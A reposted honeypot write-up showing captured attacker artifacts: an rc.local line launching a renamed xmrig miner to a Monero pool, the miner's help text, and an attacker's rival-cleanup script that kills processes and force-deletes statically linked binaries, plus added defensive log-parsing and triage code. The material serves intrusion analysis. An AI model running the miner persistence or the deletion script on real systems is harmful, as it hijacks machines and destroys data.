
Logs and scripts captured by the honeypot

freebuf 2019-03-23

Source:

What was captured

https://github.com/yingshang/Legacy-of-intrusion.git

2019-3-19

The attacker uploaded several scripts. One of them keeps generating new copies and executing them without end, which simply blows up your disk and memory; my honeypot froze completely.


2019-3-21

Monero mining

```sh
# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

/bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null
exit 0
```
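A defender reading these captures wants the monitor.log turned into a timeline with the two patterns above flagged: the 3-19 burst of ten-letter random binaries under /usr/bin with their init.d, rc*.d and cron.hourly persistence, and the rc.local entry that starts the renamed xmrig with a pool argument. The following is an added example, not code from the post or from the Legacy-of-intrusion repository; it assumes the honeypot writes one event per line as `INFO:root:<OP> event : <path>  <timestamp>`, the burst threshold is an assumption, and the sample lines are copied from the post's captured log with one constructed malformed line.

```python
import re
from datetime import datetime

# monitor.log line format as captured by the honeypot (assumption: one event
# per line): "INFO:root:<OP> event : <path>  <YYYY-MM-DD HH:MM:SS.ffffff>"
LINE_RE = re.compile(
    r"^INFO:root:(?P<op>[A-Z]+) event : (?P<path>\S+)\s+"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s*$"
)
# Persistence locations that showed up in the captured sessions
# (init.d, rc*.d S90 links, cron.hourly, crontab spool, rc.local, libudev.so).
PERSISTENCE_RE = re.compile(
    r"^(?:/etc/init\.d/|/etc/rc[0-6S]\.d/S\d\d|/etc/cron\.(?:hourly|daily|d)/"
    r"|/var/spool/cron/crontabs/|/etc/crontab$|/etc/rc\.local$|/lib/libudev\.so$)"
)
# Ten random lowercase letters directly under /usr/bin: the 3-19 dropper burst.
RANDOM_BIN_RE = re.compile(r"^/usr/bin/[a-z]{10}$")
# xmrig-style pool argument as it appeared in rc.local: "-o host:port".
POOL_ARG_RE = re.compile(r"(?:^|\s)(?:-o|--url=?)\s*(\S+:\d{2,5})")


def parse_line(line):
    """Return {'op', 'path', 'ts'} for one monitor.log line, None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"op": m.group("op"), "path": m.group("path"),
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")}


def max_in_window(timestamps, window_s):
    """Largest number of timestamps that fall inside any window_s-second span."""
    ts = sorted(timestamps)
    best = start = 0
    for end in range(len(ts)):
        while (ts[end] - ts[start]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze_monitor_log(lines, window_s=60, burst_min=5):
    """Summarise persistence writes and random-binary bursts in a monitor.log.

    window_s / burst_min are assumed thresholds; in the 3-19 capture a new
    /usr/bin/<10 letters> file appeared roughly every 5 seconds.
    """
    events = [e for e in map(parse_line, lines) if e]
    persistence = sorted({e["path"] for e in events
                          if e["op"] in ("CREATE", "MODIFY")
                          and PERSISTENCE_RE.match(e["path"])})
    rnd = [e["ts"] for e in events
           if e["op"] == "CREATE" and RANDOM_BIN_RE.match(e["path"])]
    peak = max_in_window(rnd, window_s)
    return {"events": len(events), "persistence": persistence,
            "random_bin_creates": len(rnd), "peak_per_window": peak,
            "dropper_burst": peak >= burst_min}


def rc_local_commands(text):
    """List the non-comment commands in an rc.local, with any pool URL found."""
    found = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line == "exit 0":
            continue
        m = POOL_ARG_RE.search(line)
        found.append({"command": line, "pool": m.group(1) if m else None})
    return found


# Sample input: lines copied from the post's captured log plus one constructed
# malformed line, so the example runs offline.
SAMPLE_LOG = """\
INFO:root:CREATE event : /root/mi3307  2019-03-19 11:47:38.111477
INFO:root:CREATE event : /lib/libudev.so  2019-03-19 11:47:38.640116
INFO:root:CREATE event : /usr/bin/mljdjbqxuq  2019-03-19 11:47:39.317262
INFO:root:CREATE event : /etc/init.d/mljdjbqxuq  2019-03-19 11:47:39.754944
INFO:root:CREATE event : /etc/cron.hourly/gcc.sh  2019-03-19 11:47:39.757342
INFO:root:CREATE event : /etc/rc3.d/S90mljdjbqxuq  2019-03-19 11:47:39.761409
INFO:root:CREATE event : /usr/bin/hdgxvqdrsm  2019-03-19 11:47:43.803555
INFO:root:CREATE event : /usr/bin/tfyczjenzc  2019-03-19 11:47:48.795079
INFO:root:CREATE event : /usr/bin/tcbajoqxih  2019-03-19 11:47:53.814405
INFO:root:CREATE event : /usr/bin/qwqtwyndll  2019-03-19 11:47:58.862042
INFO:root:MODIFY event : /etc/rc.local  2019-03-20 15:15:38.510660
not a log line
"""
# The rc.local entry quoted in the post, with its boilerplate comments trimmed.
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# By default this script does nothing.

/bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null
exit 0
"""

if __name__ == "__main__":
    print(analyze_monitor_log(SAMPLE_LOG.splitlines()))
    print(rc_local_commands(SAMPLE_RC_LOCAL))
```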
```text
root@92ae08a47348:/opt# ./dhpcd -h
Usage: xmrig [OPTIONS]
Options:
  -a, --algo=ALGO          specify the algorithm to use
                             cryptonight
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
      --rig-id=ID          rig identifier for pool-side statistics (needs pool support)
  -t, --threads=N          number of miner threads
  -v, --av=N               algorithm variation, 0 auto select
  -k, --keepalive          send keepalived packet for prevent timeout (needs pool support)
      --nicehash           enable nicehash.com support
      --tls                enable SSL/TLS support (needs pool support)
      --tls-fingerprint=F  pool TLS certificate fingerprint, if set enable strict certificate pinning
  -r, --retries=N          number of times to retry before switch to backup server (default: 5)
  -R, --retry-pause=N      time to pause between retries (default: 5)
      --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
      --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)
      --no-huge-pages      disable huge pages support
      --no-color           disable colored output
      --variant            algorithm PoW variant
      --donate-level=N     donate level, default 5% (5 minutes in 100 minutes)
      --user-agent         set custom user-agent string for pool
  -B, --background         run the miner in the background
  -c, --config=FILE        load a JSON-format configuration file
  -l, --log-file=FILE      log all output to a file
  -S, --syslog             use system log for output messages
      --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)
      --safe               safe adjust threads and av settings for current CPU
      --asm=ASM            ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.
      --print-time=N       print hashrate report every N seconds
      --api-port=N         port for the miner API
      --api-access-token=T access token for API
      --api-worker-id=ID   custom worker-id for API
      --api-id=ID          custom instance ID for API
      --api-ipv6           enable IPv6 support for API
      --api-no-restricted  enable full remote access (only if API token set)
      --dry-run            test configuration and exit
  -h, --help               display this help and exit
  -V, --version            output version information and exit
```

2019-03-22

The script captured on this date is the attacker's clean-up routine against rival miners. It strips the gcc.sh/cron.sh entries from /etc/crontab, deletes other families' droppers and persistence (/etc/cron.hourly/gcc.sh, /lib/libudev.so, assorted files under /tmp, /dev/shm and /var/tmp), kills their processes, and removes every statically linked binary it finds on PATH except for a long exclusion list (which, notably, contains /bin/dhpcd, the name the renamed xmrig above runs under), queueing a reinstall of procps, iproute, lsof or net-tools if that happened to delete ps, ss, lsof or netstat. It finishes by printing a few checks of /proc/*/exe, top, at and the cron directories.


#!/bin/bash

export LC_ALL=C
oldPATH="$PATH"
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

post_run_file=`mktemp`
test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$

sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab
rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.*
rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/."     " /tmp/.mountfs /tmp/seconfig /root/.ttp
chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad
chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync
rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad

pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems
pkill -9 xm32
pkill -9 xm64
pkill -9 ceurnad
pkill -9 .xmrig
pkill -9 -f /tmp/.xs/daemon.i686.mod
pkill -9 -f ./systma
pkill -9 -f /root/.local/syslogd
pkill -9 -f /tmp/samba
pkill -9 xorgg
pkill -9 sc64u
pkill -9 -f /tmp/su

if cd /etc/cron.hourly ; then
    for f in *;do
        grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f"
# (the captured script is cut off at this point in the original page; the text resumes mid-statement)
then
    #find ${PATH//:/ } | while read f; do file "$f";done | grep \
    find ${oldPATH//:/ } | xargs file | grep \
        'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \
        -e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \
        -e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \
        -e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \
        -e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \
        -e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \
        -e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \
        -e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \
        -e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \
        -e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \
        -e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \
        -e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \
        -e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \
        -e '/gofmt$' \
        -e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \
        -e '/xvbeat$' \
        -e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \
        -e '/usr/bin/valgrind' \
        -e '/usr/sbin/tzdata-update' \
        -e '/sbin/busybox' \
        -e '/sbin/cryptsetup' \
        -e '/sbin/dump' \
        -e '/sbin/e2fsck' \
        -e '/sbin/fsck.ext2' \
        -e '/sbin/fsck.ext3' \
        -e '/sbin/ldconfig' \
        -e '/sbin/mpath_ctl' \
        -e '/sbin/nash' \
        -e '/sbin/restore' \
        -e '/sbin/rmt' \
        -e '/sbin/sln' \
        -e '/bin/sln' \
        -e '/usr/sbin/build-locale-archive' \
        -e '/usr/sbin/glibc_post_upgrade.i686' \
        -e '/usr/sbin/glibc_post_upgrade.x86_64' \
        -e '/usr/sbin/libgcc_post_upgrade' \
        -e '/usr/sbin/prelink' \
        -e '/usr/sbin/plesk' \
        -e '/usr/bin/wine64-preloader' \
        -e '/usr/bin/wine-preloader' \
        -e '/bin/busybox' \
        -e '/bin/dhpcd' \
        -e '/mpath_prio_' \
        -e '/usr/sbin/sas2ircu' \
        -e '/usr/bin/rar' \
        -e '/usr/bin/rlpdump' \
        -e '/usr/bin/oracle' \
        -e '/sbin/init' \
        -e /usr/bin/netserve  \
        -e /sbin/auibusy \
        -e '/sbin/auplink' \
        -e /sbin/aumvdown \
        -e '/usr/local/bin/sas2ircu' \
        -e '/usr/local/bin/sas3ircu' \
        -e '/usr/sbin/glibc_post_upgrade' \
        -e '/sbin/discover' \
        -e '/usr/bin/jad' | while read ff;do
    chattr -i "$ff"
#    rm -vi "$ff"/dev/tty
    rm -f "$ff"
    if echo "$ff" | grep '/ps$' ; then
        echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file
    fi
    if echo "$ff" | grep '/ss$' ; then
        echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file
    fi
    if echo "$ff" | grep '/lsof$' ; then
        echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file
    fi
    if echo "$ff" | grep '/netstat$' ; then
        echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file
    fi
done
fi

echo More checks:
ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus

if which file ; then
    for l in /proc/*/exe;do
        file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections'
    done
fi

echo 'top -bn1 | head -n 20:'
top -bn1 | head -n 20

echo atq:
atq

echo 'crontab -l:'
crontab -l

echo /etc/crontab:
cat /etc/crontab

echo /etc/cron.hourly:
ls -la /etc/cron.hourly

echo /etc/cron.d:
ls -la /etc/cron.d

set -x
. $post_run_file
rm $post_run_file
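The "More checks" block at the end of the captured script is the attacker's own post-cleanup audit (executables under /tmp, /dev or /var in /proc/*/exe, statically linked binaries on PATH, crontab contents), and the rm and pkill lists above it double as an indicator list for the rival miners it targets. The following is an added example, not code from the original page or from the script's author, that turns those checks into a read-only Python triage: it parses ELF program headers directly instead of shelling out to file, and every check takes already-collected data so it runs against a disk image as well as a live host. The IOC lists are lifted from the script; the function names, the constructed ELF images and the sample process table in the usage are mine.

```python
"""Read-only triage modelled on the captured script's "More checks" block. Added
example, not code from the original page or from the script's author: it reports
what the script acts on and never removes or kills anything itself."""
import os
import re
import struct
from typing import Dict, Iterable, List

# Artefacts the captured script deletes or kills, lifted from the script above.
IOC_PATHS = ("/etc/cron.hourly/gcc.sh", "/etc/cron.hourly/gcc4.sh", "/lib/libudev.so",
             "/bin/httpsd", "/usr/local/sbin/t", "/usr/local/sbin/rsync", "/etc/ceurnad",
             "/tmp/.xm", "/root/.system", "/tmp/.X12-unix", "/usr/cpu/bin", "/tmp/.mountfs")
IOC_PROCESS_NAMES = {"xm32", "xm64", "ceurnad", ".xmrig", "xorgg", "sc64u"}
CRON_DROPPER = re.compile(r"/etc/cron\.hourly/(gcc|cron)\.sh")  # the script's sed pattern
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/dev/", "/run/shm/")
PT_DYNAMIC, PT_INTERP = 2, 3

def suspicious_exe(path: str) -> bool:
    """Running from a scratch directory, a relative path, or unlinked after exec:
    the cases the script greps for in `ls -l /proc/*/exe`."""
    return (path.startswith(SCRATCH_DIRS) or path.startswith("./")
            or path.endswith(" (deleted)"))

def flag_cron_lines(lines: Iterable[str]) -> List[str]:
    """Crontab lines running the gcc.sh/cron.sh droppers or anything in a scratch dir."""
    return [l for l in lines
            if CRON_DROPPER.search(l) or any(d in l for d in SCRATCH_DIRS)]

def present_iocs(exists=os.path.exists) -> List[str]:
    """Which of the script's file targets exist; `exists` is injectable for offline use."""
    return [p for p in IOC_PATHS if exists(p)]

def elf_segment_types(image: bytes) -> List[int]:
    """p_type of every program header (ELF32 or ELF64, either byte order)."""
    if image[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    end = "<" if image[5] == 1 else ">"
    if image[4] == 2:                                     # ELFCLASS64
        (phoff,) = struct.unpack_from(end + "Q", image, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", image, 54)
    else:                                                 # ELFCLASS32
        (phoff,) = struct.unpack_from(end + "I", image, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", image, 42)
    # p_type is the first field of a program header in both layouts.
    return [struct.unpack_from(end + "I", image, phoff + i * phentsize)[0]
            for i in range(phnum)]

def is_static_elf(image: bytes) -> bool:
    """What `file` calls "statically linked": no PT_INTERP and no PT_DYNAMIC. A
    static-pie binary keeps PT_DYNAMIC and is missed here, exactly as the script's
    grep for 'statically linked' misses it; non-ELF or truncated input is False."""
    try:
        types = elf_segment_types(image)
    except (ValueError, IndexError, struct.error):
        return False
    return PT_INTERP not in types and PT_DYNAMIC not in types

def build_elf64(segment_types: List[int]) -> bytes:
    """Constructed sample input: minimal ELF64 image, header plus one program header
    per requested p_type. Parseable, not loadable."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)      # 64-bit, LE, version 1
    hdr = struct.pack("<16sHHIQQQIHHHHHH", ident, 2, 62, 1, 0, 64, 0, 0,
                      64, 56, len(segment_types), 0, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 5, 0, 0, 0, 0, 0, 0)
                     for t in segment_types)
    return hdr + phdrs

def triage(proc_table: Dict[int, str], crontab: Iterable[str],
           path_binaries: Dict[str, bytes]) -> Dict[str, list]:
    """Pure function over collected data, so it also works on an offline image."""
    return {"exe": sorted(pid for pid, exe in proc_table.items()
                          if suspicious_exe(exe)
                          or os.path.basename(exe) in IOC_PROCESS_NAMES),
            "cron": flag_cron_lines(crontab),
            "static": sorted(p for p, img in path_binaries.items() if is_static_elf(img))}

def _read_head(path: str, limit: int) -> bytes:
    try:
        with open(path, "rb") as fh:
            return fh.read(limit)
    except OSError:
        return b""

def collect_live() -> Dict[str, list]:
    """Same inputs from the running host, read-only; 4 KiB covers the program headers."""
    procs = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            procs[int(pid)] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            pass
    cron = [ln for f in ("/etc/crontab", "/var/spool/cron/root", "/var/spool/cron/crontabs/root")
            for ln in _read_head(f, -1).decode(errors="replace").splitlines()]
    bins = {p: _read_head(p, 4096) for d in os.environ.get("PATH", "").split(":")
            if os.path.isdir(d) for p in (os.path.join(d, n) for n in os.listdir(d))}
    result = triage(procs, cron, bins)
    result["ioc"] = present_iocs()
    return result
```

For a live host run collect_live() as root; offline, build proc_table from the /proc listing of a memory capture and path_binaries from the image's PATH directories and call triage() directly. A statically linked file on PATH is a lead, not a verdict: the exclusion list in the captured script (busybox, ldconfig, sln, e2fsck, the glibc post-upgrade helpers) shows how many legitimate ones a stock system carries, so the sensible next step is to compare hits against package-manager ownership (rpm -qf, dpkg -S) rather than to delete them.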


When reposting, please credit 网盾网络安全培训 (Wangdun network security training); article title: 《蜜罐捕捉的日志脚本整理》 (Honeypot-captured logs and scripts, collated).

Tags: honeypot, log analysis, intrusion analysis
